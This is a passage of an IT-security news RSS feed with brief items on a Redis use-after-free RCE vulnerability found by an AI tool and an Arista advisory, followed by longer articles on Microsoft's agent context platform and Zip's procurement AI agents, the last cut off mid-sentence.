<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paweljw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paweljw">@paweljw</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4571800449" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1715" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1715/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1715">#1715</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgreeno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgreeno">@cgreeno</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581802133" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1797" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1797/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1797">#1797</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.8.3...v15.9.0"><tt>v15.8.3...v15.9.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-23479: KI-Tool findet nach 2 Jahren Authenticated RCE-Lücke in Redis]]></title>
<description><![CDATA[LONDON / LONDON (IT BOLTWISE) – Ein autonomes KI-Tool hat eine Use-after-Free-Lücke in Redis nach über zwei Jahren unentdeckt aufgespürt, die sich von einem Authenticated Zugriff zu Remote Code Execution (RCE) ausweiten kann. Die Kette (CVE-2026-23479) betrifft das blocking-client-Verhalten und w...]]></description>
<link>https://tsecurity.de/de/3577254/it-security-nachrichten/cve-2026-23479-ki-tool-findet-nach-2-jahren-authenticated-rce-luecke-in-redis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577254/it-security-nachrichten/cve-2026-23479-ki-tool-findet-nach-2-jahren-authenticated-rce-luecke-in-redis/</guid>
<pubDate>Sat, 06 Jun 2026 09:52:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-cve-2026-23479-rce-use-after-free-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / LONDON (IT BOLTWISE) – Ein autonomes KI-Tool hat eine Use-after-Free-Lücke in Redis nach über zwei Jahren unentdeckt aufgespürt, die sich von einem Authenticated Zugriff zu Remote Code Execution (RCE) ausweiten kann. Die Kette (CVE-2026-23479) betrifft das blocking-client-Verhalten und wurde in Redis 7.2.0 eingeführt, blieb jedoch in stabilen Branches bis zu den Fixes am […]</p>
<div><a href="https://www.it-boltwise.de/cve-2026-23479-ki-tool-findet-nach-2-jahren-authenticated-rce-luecke-in-redis.html">... den vollständigen Artikel <strong>»CVE-2026-23479: KI-Tool findet nach 2 Jahren Authenticated RCE-Lücke in Redis«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/cve-2026-23479-ki-tool-findet-nach-2-jahren-authenticated-rce-luecke-in-redis.html">CVE-2026-23479: KI-Tool findet nach 2 Jahren Authenticated RCE-Lücke in Redis</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis-RCE via Use-after-Free: KI-Finder entdeckt CVE-2026-23479 nach 2 Jahren]]></title>
<description><![CDATA[LONDON / LONDON (IT BOLTWISE) – Redis hat einen Use-after-Free-Bug in der Blocking-Client-Logik geschlossen, der einen authentifizierten Angreifer zu Remote Code Execution führen kann. Die Schwachstelle CVE-2026-23479 blieb über zwei Jahre in mehreren stabilen Zweigen, bis ein autonomes KI-Tool s...]]></description>
<link>https://tsecurity.de/de/3576918/it-security-nachrichten/redis-rce-via-use-after-free-ki-finder-entdeckt-cve-2026-23479-nach-2-jahren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576918/it-security-nachrichten/redis-rce-via-use-after-free-ki-finder-entdeckt-cve-2026-23479-nach-2-jahren/</guid>
<pubDate>Sat, 06 Jun 2026 04:07:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-redis-rce-cve-2026-23479-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / LONDON (IT BOLTWISE) – Redis hat einen Use-after-Free-Bug in der Blocking-Client-Logik geschlossen, der einen authentifizierten Angreifer zu Remote Code Execution führen kann. Die Schwachstelle CVE-2026-23479 blieb über zwei Jahre in mehreren stabilen Zweigen, bis ein autonomes KI-Tool sie in großen Codebasen nachspürte. Laut Analysen erhöhen typische Cloud- und Standard-Deployments das Risiko zusätzlich: Viele […]</p>
<div><a href="https://www.it-boltwise.de/redis-rce-via-use-after-free-ki-finder-entdeckt-cve-2026-23479-nach-2-jahren.html">... den vollständigen Artikel <strong>»Redis-RCE via Use-after-Free: KI-Finder entdeckt CVE-2026-23479 nach 2 Jahren«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/redis-rce-via-use-after-free-ki-finder-entdeckt-cve-2026-23479-nach-2-jahren.html">Redis-RCE via Use-after-Free: KI-Finder entdeckt CVE-2026-23479 nach 2 Jahren</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-5088 | Arista EOS/CloudVision eXchange up to 4.34.1F Redis Service privileges management (EUVD-2025-210077)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Arista EOS and CloudVision eXchange up to 4.30.x/4.31.8M/4.32.6M/4.33.4M/4.34.1F. This vulnerability affects unknown code of the component Redis Service. Performing a manipulation results in improper privilege management.

This ...]]></description>
<link>https://tsecurity.de/de/3576404/sicherheitsluecken/cve-2025-5088-arista-eoscloudvision-exchange-up-to-4341f-redis-service-privileges-management-euvd-2025-210077/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576404/sicherheitsluecken/cve-2025-5088-arista-eoscloudvision-exchange-up-to-4341f-redis-service-privileges-management-euvd-2025-210077/</guid>
<pubDate>Fri, 05 Jun 2026 21:23:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/arista:eos">Arista EOS and CloudVision eXchange up to 4.30.x/4.31.8M/4.32.6M/4.33.4M/4.34.1F</a>. This vulnerability affects unknown code of the component <em>Redis Service</em>. Performing a manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-5088">CVE-2025-5088</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in redis (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3573790/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573790/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-red-hat/</guid>
<pubDate>Thu, 04 Jun 2026 22:07:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)]]></title>
<description><![CDATA[Redis has  patched  a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.
Tracked as CVE-2026-23479, the flaw was introduced in ...]]></description>
<link>https://tsecurity.de/de/3570774/it-security-nachrichten/autonomous-ai-tool-finds-2-year-old-rce-flaw-in-redis-cve-2026-23479/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570774/it-security-nachrichten/autonomous-ai-tool-finds-2-year-old-rce-flaw-in-redis-cve-2026-23479/</guid>
<pubDate>Wed, 03 Jun 2026 22:52:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Redis has  patched  a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.
Tracked as CVE-2026-23479, the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years.]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise AI agents keep creating data silos. Microsoft's Build answer is Microsoft IQ and Rayfin.]]></title>
<description><![CDATA[Every new AI agent your team deploys starts from scratch: no memory of how the business works, where data lives, or what rules apply. And as agentic coding tools spin up applications faster than anyone can govern them, each one risks becoming another silo outside your data layer entirely. Microso...]]></description>
<link>https://tsecurity.de/de/3567183/it-nachrichten/enterprise-ai-agents-keep-creating-data-silos-microsofts-build-answer-is-microsoft-iq-and-rayfin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567183/it-nachrichten/enterprise-ai-agents-keep-creating-data-silos-microsofts-build-answer-is-microsoft-iq-and-rayfin/</guid>
<pubDate>Tue, 02 Jun 2026 20:02:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every new AI agent your team deploys starts from scratch: no memory of how the business works, where data lives, or what rules apply. And as agentic coding tools spin up applications faster than anyone can govern them, each one risks becoming another silo outside your data layer entirely. Microsoft is addressing both problems directly at Build 2026.</p><p>According to <a href="https://venturebeat.com/data/the-retrieval-rebuild-why-hybrid-retrieval-intent-tripled-as-enterprise-rag-programs-hit-the-scale-wall">VentureBeat's VB Pulse's Q1 2026 RAG Infrastructure Market Tracker</a>, hybrid retrieval intent among 100-plus employee organizations tripled from 10.3% in January to 33.3% in March, a signal that enterprises have moved past expanding RAG coverage and are now focused on the architecture underneath it. Shared business context is the part retrieval does not solve.</p><p>On the context side, Microsoft is expanding Fabric IQ, its existing business data context layer, into a broader unified system called Microsoft IQ, adding three additional context sources covering how the organization works, what it knows and real-time global signals from the web, so any agent can tap all four as a single foundation. On the application side, Rayfin, a new open-source SDK and CLI, deploys agent-built applications directly to Fabric as a governed production backend, routing application data into the same platform rather than spinning up new silos.</p><p>Amir Netz, CTO of Microsoft Fabric, reached for a film analogy to explain where the data platform fits. The green screen of cascading code in "The Matrix" wasn't atmosphere, it was the layer that built the world Agent Smith operated in.</p><p>"Our job in the world of data is creating reality for agents based on data," Netz told VentureBeat.</p><h2>Microsoft IQ unifies four context sources into a single agent foundation</h2><p>Microsoft IQ brings together four context sources that until now existed separately, designed so a developer can connect a new agent to all four in a single integration step.</p><p><b>Work IQ.</b> Captures how the organization operates day to day, drawing on email, documents, meetings and schedules to give agents an understanding of people, teams and workflows.</p><p><b>Foundry IQ.</b> Manages institutional knowledge, curating and indexing knowledge bases so agents understand what it means to work within the organization, what rules apply and what procedures to follow.</p><p><b>Fabric IQ.</b> Models the live operational state of the business through data, defining entities, relationships and business rules grounded in real-time signals from Fabric Real-Time Intelligence. Ontologies, the layer that captures that operational context, are expected to reach GA in the coming months.</p><p><b>Web IQ.</b> Adds real-time global context from the web, giving agents a current picture of the world outside the organization alongside its internal data.</p><p>"The agents are going to become highly informed virtual employees," Netz said. "That's where the world is heading."</p><h2>Rayfin routes agent-built applications into the same data foundation</h2><p>Building shared context solves one half of the problem. The other is what happens when agents start generating applications. Every new app needs a backend, and without a governed deployment path each one creates a new data silo outside the context layer entirely.</p><p>Rayfin provides an enterprise-grade back end and deploys agent-built applications directly to Fabric, so application data lands in Microsoft OneLake by default and feeds back into the Microsoft IQ context layer rather than accumulating outside it.</p><p>Microsoft positions Rayfin against Supabase and Neon, the Postgres-compatible backends that agentic coding tools default to. The differentiator is governance: Rayfin routes the entire application fleet through Fabric's unified data and compliance layer rather than creating isolated silos.</p><p>Netz described the relationship as bidirectional. The agent building a Rayfin application draws from the organization's ontology. The data that application generates then enriches that ontology for the next agent.</p><h2>Every major data platform is chasing the same answer, but execution is unproven</h2><p>Microsoft is not the only platform building a shared context layer for agents.<a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem"> Snowflake announced</a> its own context capabilities this week with semantic capabilities.<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next?_gl=1*vqdbsi*_up*MQ..*_ga*ODYxNzkxNzIzLjE3ODA0MTk1NjQ.*_ga_B8TDS1LEXQ*czE3ODA0MTk1NjIkbzEkZzEkdDE3ODA0MTk1NjIkajYwJGwwJGgw*_ga_SCH1J7LNKY*czE3ODA0MTk1NjIkbzEkZzAkdDE3ODA0MTk1NjIkajYwJGwwJGgw"> Pinecone</a> has its Nexus platform that expands the vector database to become a knowledge engine and Redis has developed its<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits?_gl=1*vqdbsi*_up*MQ..*_ga*ODYxNzkxNzIzLjE3ODA0MTk1NjQ.*_ga_B8TDS1LEXQ*czE3ODA0MTk1NjIkbzEkZzEkdDE3ODA0MTk1NjIkajYwJGwwJGgw*_ga_SCH1J7LNKY*czE3ODA0MTk1NjIkbzEkZzAkdDE3ODA0MTk1NjIkajYwJGwwJGgw"> Iris context</a> and memory platform.</p><p>Microsoft's approach further reinforces the trend that RAG and model availability aren't the issue anymore.</p><p>"Fabric IQ and Rayfin are important because the enterprise AI challenge is no longer just about the model availability," Robert Kramer, managing partner at KramerERP told VentureBeat. "The real question is whether Microsoft simplifies execution and strengthens trust or adds another layer to an already complex environment."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zip’s new AI agents want to stop your finance team from uploading contracts into personal ChatGPT accounts]]></title>
<description><![CDATA[Zip, the AI procurement platform valued at $2.2 billion, announced two products on Monday that mark a turning point in its evolution from procurement software to autonomous AI platform: a suite of five AI "Superagents" that can review contracts, code invoices, and negotiate with vendors inside Zi...]]></description>
<link>https://tsecurity.de/de/3566319/it-nachrichten/zips-new-ai-agents-want-to-stop-your-finance-team-from-uploading-contracts-into-personal-chatgpt-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566319/it-nachrichten/zips-new-ai-agents-want-to-stop-your-finance-team-from-uploading-contracts-into-personal-chatgpt-accounts/</guid>
<pubDate>Tue, 02 Jun 2026 15:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://zip.com/">Zip</a>, the AI procurement platform valued at <a href="https://zip.com/blog/series-d">$2.2 billion</a>, announced two products on Monday that mark a turning point in its evolution from procurement software to autonomous AI platform: a suite of five AI "Superagents" that can review contracts, code invoices, and negotiate with vendors inside Zip's governance framework, and a procurement-native implementation of the Model Context Protocol (MCP) that pipes Zip's data directly into AI assistants like Claude and ChatGPT — without sacrificing audit trails or compliance controls.</p><p>The announcements, unveiled at <a href="https://events.ziphq.com/ai-summit/?utm_source=linkedin&amp;utm_medium=social">Zip's AI Summit in New York</a> with speakers from <a href="http://anthropic.com/">Anthropic</a>, <a href="https://openai.com/">OpenAI</a>, <a href="https://www.datadoghq.com/">Datadog</a>, and <a href="https://www.humana.com/">Humana</a>, arrive at a moment when the procurement technology sector has become one of the fiercest battlegrounds in enterprise AI. SAP unveiled its "Autonomous Enterprise" vision at Sapphire 2026 just weeks ago, introducing more than 50 domain-specific Joule Assistants across finance, supply chain, and procurement. Coupa launched its own Compose platform and Catalyst services bundle at Inspire 2026 in Las Vegas in May, an environment for building and orchestrating AI agents across procurement, along with a forward-deployed engineering services offering. And Gartner predicts 40% of enterprise applications will include task-specific AI agents by end of 2026, up from less than 5% today.</p><p>What makes Zip's approach distinct — and what makes it a potentially important test case for the broader enterprise AI market — is not the agents themselves, but where they run and what constrains them.</p><h2><b>Why procurement teams are uploading sensitive financial data into personal AI accounts</b></h2><p>The announcement centers on an enterprise anxiety that procurement chiefs increasingly describe in private but rarely say publicly: their employees are already using AI for sensitive financial work, they're just doing it in unmonitored, personal accounts. </p><p>Across the enterprise, employees are uploading spend data into Claude to analyze it, redlining sensitive contracts inside ChatGPT, and generating internal financial analyses in personal Gemini or Copilot accounts. Every time they do, sensitive enterprise data leaves systems where every action is controlled and audited, entering environments with no oversight, no compliance controls, and no record of what was done.</p><p>The consequences for getting this wrong are not hypothetical. <a href="https://en.wikipedia.org/wiki/Sarbanes%E2%80%93Oxley_Act">SOX violations</a> carry fines of up to $25 million. Executives can face prison time. Public companies that fail compliance audits can be delisted from the stock exchange. When an auditor asks how a decision was made six months later, no one can produce a record.</p><p>"After working with hundreds of enterprises — including the world's leading AI companies — we've learned that this kind of work is already happening, with or without governance," said Lu Cheng, Co-Founder and CTO at Zip. "Even the companies building AI themselves want this work governed."</p><p>Zip's CEO Rujul Zaparde put a finer point on it in an interview with VentureBeat, describing the competitive dynamics that make procurement an unusually high-stakes domain for AI governance. "Most enterprises don't operate on a single procurement platform," Zaparde said. "They're running SAP as their ERP, Coupa for some sourcing, ServiceNow for IT requests, contract management tools for legal, risk and compliance platforms for vendor due diligence, and a long tail of point tools alongside them." </p><p>He argued that this fragmentation gives Zip, as the orchestration layer connecting all of those systems, a unique advantage: "AI can only be as good as the data it has access to. Because Zip sits above all of these tools, with visibility into each, and orchestrates the entire procurement process from request to payment, its AI can take action across the full procurement workflow in ways point solutions cannot."</p><h2><b>Inside the five Superagents Zip built to automate procurement's hardest bottlenecks</b></h2><p>Zip is launching five <a href="https://zip.com/ai">Superagents</a>, each targeting a specific pressure point in the procurement lifecycle. A Procurement Superagent unblocks stalled requests and manages tail-spend negotiation. A Legal Superagent reviews and redlines contracts against company-approved playbooks. An AP Superagent sorts, codes, matches, and routes invoices. A Config Superagent identifies workflow bottlenecks and drafts configuration changes for admin review. And an Intake Superagent guides employees through compliant request creation, routing purchases to the right buying channel and nudging toward preferred suppliers.</p><p>The five agents are not standalone services. <a href="https://zip.com/engineering-blog">Zip's engineering blog</a> reveals the architectural philosophy underlying them: all agents at Zip — pre-built and custom — run on a shared execution engine built within the company's App Studio workflow automation platform. They differ only in configuration: the prompt that defines behavior, the tools they can access, and the format of their output. Zip's engineering team describes this as a "<a href="https://zip.com/engineering-blog/custom-agents-composable-ai-platform">Lego block</a>" model — the out-of-the-box agents are finished models; custom agents are whatever enterprises choose to build from the same components.</p><p>Under the hood, the agent architecture uses a <a href="https://zip.com/engineering-blog/custom-agents-composable-ai-platform">four-node LangGraph state graph</a> — preprocessing, orchestration, final synthesis, and post-processing — that separates information gathering from response generation. The orchestration node contains a ReAct (Reason + Act) agent that autonomously decides which tools to call: document retrieval via vector search, structured API data from purchase requests and contracts, or company-specific policy context from a reference library.</p><p>This separation is deliberate. As Zip's engineering team explains, conflating research and synthesis into a single LLM call would mean asking one model to be both a diligent researcher and an eloquent writer simultaneously. Separating them allows Zip to optimize each independently — including using different model tiers for each.</p><p>What differentiates Zip's agents from the slew of procurement AI announcements from <a href="https://www.sap.com/index.html">SAP</a>, <a href="https://www.coupa.com/">Coupa</a>, and others is the governance architecture. Every Superagent action is governed by the same roles, permissions, and controls that apply to human employees. High-impact steps like system updates and approvals use deterministic logic rather than LLM inference. And every action generates a complete audit trail.</p><h2><b>What happens when an AI agent misclassifies a $150,000 contract</b></h2><p>Zaparde shared a specific error case from beta testing to illustrate how Zip's human-in-the-loop design handles real-world failures. "Our Intake Superagent flagged a $150K marketing services contract as a standard SaaS subscription," he said. "But because every Superagent action hits a human-in-the-loop checkpoint before it executes, the procurement team caught the misclassification before it went anywhere. They corrected the category, the right approvers were routed in, and the GL coding flowed through accurately downstream."</p><p>The error-and-correction anecdote is revealing because it highlights the tension at the heart of every enterprise AI deployment: these systems will make mistakes, and the question is whether the surrounding infrastructure catches them before they cause damage.</p><p>Zaparde was direct when asked who bears liability if a Superagent triggers a compliance failure: "Customers remain accountable for their procurement decisions, the same way they would be with any vendor or business process. That's standard across enterprise software. Payroll vendors don't take on liability for misclassified employees, ERP vendors don't take on liability for misstated financials, and the same principle applies to AI-augmented work."</p><p>But he was equally emphatic that the design goal is to make the liability question moot. "Zip's Superagents are designed so this scenario shouldn't happen in the first place. They don't operate outside governance, they operate inside it. Every action is auditable, every high-impact step is gated by human review, and the audit trail makes it possible to demonstrate compliant decision-making to auditors and regulators."</p><p>The Superagents are currently in beta, with general availability expected this summer. Zip has been deploying AI agents in procurement since 2024, and today more than 50 are live across hundreds of enterprise customers. <a href="https://zip.com/customers/northwestern-mutual">Northwestern Mutual</a> alone saved 1,400 hours from a single AI agent. Superagents represent the next evolution — more reasoning, more cross-system action, more autonomy — all inside Zip's governance layer. </p><p>When asked what percentage of agent actions require human escalation, Zaparde said there's no single number because every agent handles a different type of task, but added: "In finance and procurement specifically, we deliberately err on the side of escalation any time a transaction touches risk thresholds, policy compliance, legal requirements, budget guardrails, or governance rules. That's a deliberate design choice, not a limitation."</p><h2><b>How Zip's procurement-native MCP could reshape where enterprise AI actually runs</b></h2><p>The second announcement may prove more consequential for the broader enterprise AI market. <a href="https://zip.com/">Zip MCP</a> is a vendor-hosted implementation of the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol</a> — the open standard originally created by Anthropic in November 2024 and later donated to the Linux Foundation, with MCP SDK downloads reaching 97 million per month by March 2026, a 970x increase in 18 months.</p><p>A fundamental challenge has limited MCP's enterprise adoption: organizations deploying MCP are running into a predictable set of problems — audit trails, SSO-integrated auth, gateway behavior, and configuration portability. The MCP protocol itself doesn't yet natively solve for the governance requirements that regulated industries and compliance-sensitive functions like procurement demand.</p><p>Zip is attempting to solve this from the application layer. Its MCP server connects Zip's procurement platform directly to any MCP-compatible AI assistant. An employee researching vendors in Claude, for instance, can have Zip proactively surface a request submission from that conversation. Power users can pull aggregated reporting across suppliers, requests, invoices, and payments from within a single AI conversation. Every action respects user permissions through OAuth, runs inside Zip's compliance controls, and generates a complete audit trail. Zip claims this is the first time MCP has been implemented natively for enterprise procurement.</p><p>The claim matters because procurement is arguably the most governance-sensitive business function where MCP could deliver immediate value: it involves financial commitments, legal contracts, regulatory compliance, and supplier data that touch SOX, GDPR, and dozens of other regulatory frameworks.</p><p>When asked what happens to sensitive data once it reaches a third-party model's context window, Zaparde was direct: "MCP is tied to an authenticated user, and the same role-based permissions that apply inside Zip apply through MCP as well — meaning MCP can only retrieve information the user is already authorized to see." He added that Anthropic and OpenAI operate as Zip subprocessors, governed by data processing agreements with Zero Data Retention provisions, so "data flowing through MCP isn't used for model training, and it's protected by enterprise-grade controls at both ends of the connection."</p><h2><b>The companies building AI chose Zip instead of building their own procurement tools</b></h2><p>Zip's customer list for these announcements is impressive but still developing. <a href="https://block.xyz/">Block</a>, <a href="https://www.ucihealth.org/">UCI Health</a>, and <a href="https://www.snowflake.com/en/">Snowflake</a> are the named launch customers for AI Spend Automation, the premium enterprise offering that bundles platform access, AI consumption credits, and Zip's forward-deployed engineers. </p><p><a href="https://www.ucihealth.org/">UCI Health</a> reported $20 million in cost avoidance from a single IT infrastructure project. Zaparde explained the methodology: "The $20 million came from a single IT infrastructure project at UCI Health where their procurement team used AI-powered benchmarking to enter vendor negotiations with real market data rather than internal assumptions alone." He was careful to frame it as a collaborative result: "UCI Health's procurement team did the negotiating and the AI gave them the benchmarks to do it well."</p><p>Zip claims its broader customer base has saved more than $10 billion through its AI suite. Zaparde said that figure "includes direct cost reductions through better vendor negotiations, time savings from automating manual procurement workflows, risk reduction through avoided fines and compliance penalties, and indirect spend savings from improved renewal management." A Forrester Total Economic Impact study modeled a 386% ROI for large enterprises using Zip, showing that on average, the platform pays for itself in under six months.</p><p>But the customer stories that matter most for Zip's strategic narrative are its relationships with the companies whose models power its own agents. <a href="https://zip.com/customers/openai">OpenAI</a> has deployed more than 10 AI agents on Zip's platform. <a href="https://zip.com/customers/anthropic">Anthropic</a>, whose Claude model Zip uses and whose engineers created MCP, more than doubled its procurement volume through Zip while keeping headcount flat. </p><p>The fact that both companies chose to buy rather than build is arguably Zip's strongest competitive proof point: if the organizations with the most AI engineering talent on earth decided the procurement governance problem wasn't worth solving internally, it suggests the moat is real. Beyond AI, the customer list spans <a href="https://zip.com/customers/t-mobile">T-Mobile</a>, <a href="https://zip.com/customers/dollar-tree">Dollar Tree</a>, <a href="https://zip.com/customers/canva">Canva</a>, and <a href="https://zip.com/customers/prudential">Prudential</a> — large, regulated enterprises where compliance failures carry material consequences.</p><p>"When the companies building AI choose Zip rather than build it themselves, that tells you something about the moat," Zaparde said.</p><h2><b>SAP, Coupa, and the intensifying AI arms race in enterprise procurement</b></h2><p>Zip's announcements don't happen in a vacuum. The enterprise procurement AI market is experiencing a rapid convergence as every major platform races to embed agentic capabilities.</p><p>SAP has deployed more than 50 domain-specific <a href="https://www.sap.com/products/artificial-intelligence/ai-assistant.html">Joule Assistants</a> at <a href="https://www.sap.com/blogs/top-5-sapphire-2026-ai-announcements">Sapphire 2026</a>, orchestrating a subset of over 200 specialized agents to execute precise tasks. SAP has even launched a Joule Agent in the SAP Ariba Intake Management solution that captures and routes procurement requests and connects to existing procurement systems — a move that reaches directly into Zip's core territory. Coupa CEO Leagh Turner has argued her platform's foundation sets it apart, saying that while others are "bolting AI onto aging systems," Coupa has one platform that scales with governance. Coupa says it has deployed more than 20 specialized agents, and its $10 trillion dataset of historical transactions gives it a training data advantage that Zip cannot match.</p><p>Zaparde's counter-argument rests squarely on Zip's position as an orchestration layer rather than a point solution. "No matter how powerful those individual tools are, their AI is necessarily limited to the data inside each of their own systems," he said. "Our moat is the orchestration layer and the AI agents built on top of it: agents that are uniquely able to reason and act across multiple systems and reconcile their data as a whole where needed." He pointed to Zip's recognition as a Leader in the first-ever <a href="https://zip.com/resources/idc-marketscape-spend-orchestration">IDC MarketScape for Spend Orchestration</a> as evidence that the category itself has been validated.</p><p>The argument carries a strategic vulnerability, however, that Zaparde was asked about directly: Zip's leading AI-company customers are also its model providers and potential competitors. What happens if Anthropic or OpenAI builds procurement tooling? </p><p>"The mistake is assuming procurement is fundamentally a model problem," Zaparde responded. "Even if an LLM could perfectly understand a contract or negotiate with a vendor, it still needs to operate within company policies, approval chains, supplier relationships, ERP systems, and audit requirements. That context layer is what Zip has spent the past six years building. We see the model providers as accelerating what's possible, while we focus on making that intelligence operational within the enterprise."</p><h2><b>Why Zip is trading SaaS margins for forward-deployed engineers and AI credits</b></h2><p>The <a href="https://zip.com/ai">AI Spend Automation</a> offering raises questions about Zip's evolving business model. Bundling platform access, AI consumption credits, and forward-deployed engineers who build and deploy custom agents inside customer environments is a strikingly different margin profile than traditional SaaS — and it's a model that Coupa, with its own new Catalyst services offering, is also now pursuing.</p><p>Zaparde was transparent about the tradeoff: "Yes, it is a different margin profile than pure SaaS, and we're okay with that. Right now, our priority is adoption and proving value for customers. We believe that if we get the outcomes right, the economics follow. Companies that rush to protect margins before they've demonstrated real value end up with neither. We're playing the long game."</p><p>Zip is <a href="https://zip.com/blog/series-d">valued at $2.2 billion</a> as of its October 2024 Series D round, the largest investment in procurement technology in over two decades. The company has raised approximately $371 million since its founding in 2020 and counts among its investors <a href="https://www.ycombinator.com/">Y Combinator</a>, <a href="https://www.bondcap.com/">BOND</a>, <a href="https://dst-global.com/">DST Global</a>, <a href="https://www.tigerglobal.com/">Tiger Global</a>, and <a href="https://www.crv.com/">CRV</a>.</p><p>The deepest technical signal in Monday's announcement may be what it reveals about the infrastructure moat Zip is building beneath its agents. The company's engineering team recently published detailed architecture for its internationalization system — a pipeline that uses LLM-based translation with glossary enforcement, Kafka change data capture, and a dedicated Redis caching cluster to translate user-generated content across multinational enterprise customers in real time.</p><p>The 